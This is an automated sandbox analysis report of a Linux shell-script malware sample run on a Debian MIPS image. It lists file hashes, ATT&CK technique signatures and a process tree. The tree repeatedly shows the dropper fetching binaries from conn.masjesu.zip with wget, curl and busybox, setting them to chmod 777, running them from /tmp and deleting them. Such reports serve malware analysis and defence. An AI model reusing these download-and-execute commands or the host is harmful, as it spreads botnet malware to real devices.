Analysis
-
max time kernel
150s -
max time network
127s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
24/11/2024, 01:00
Static task
static1
Behavioral task
behavioral1
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
-
Size
10KB
-
MD5
03977dc333adcf1bd239088130c5146a
-
SHA1
786dda0f9a258257c3c8c8c196b0c80525e5c921
-
SHA256
ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613
-
SHA512
6ecac3ce1d920fd81213a199987a4a9a636a164c9bbf7c86cba42a80c7d290b356c0afcf43ffaab877a673204b166c43ca7a878f6ee263c34bdec145196d5066
-
SSDEEP
192:9C6r48xt6ApTzGrokonqyTCaxYxKC6r48oiTzGSkonqyr:/t6ApTzGrwCxiTzG0
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 24 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh/tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:737
-
-
/bin/chmodchmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵PID:741
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:742
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:745
-
-
/bin/chmodchmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵PID:748
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:749
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:767
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵PID:851
-
-
/bin/chmodchmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:865
-
-
/bin/chmodchmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675./aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:872
-
-
/bin/chmodchmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:942
-
-
/bin/chmodchmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:956
-
-
/bin/chmodchmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675./aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Reads runtime system information
PID:982
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97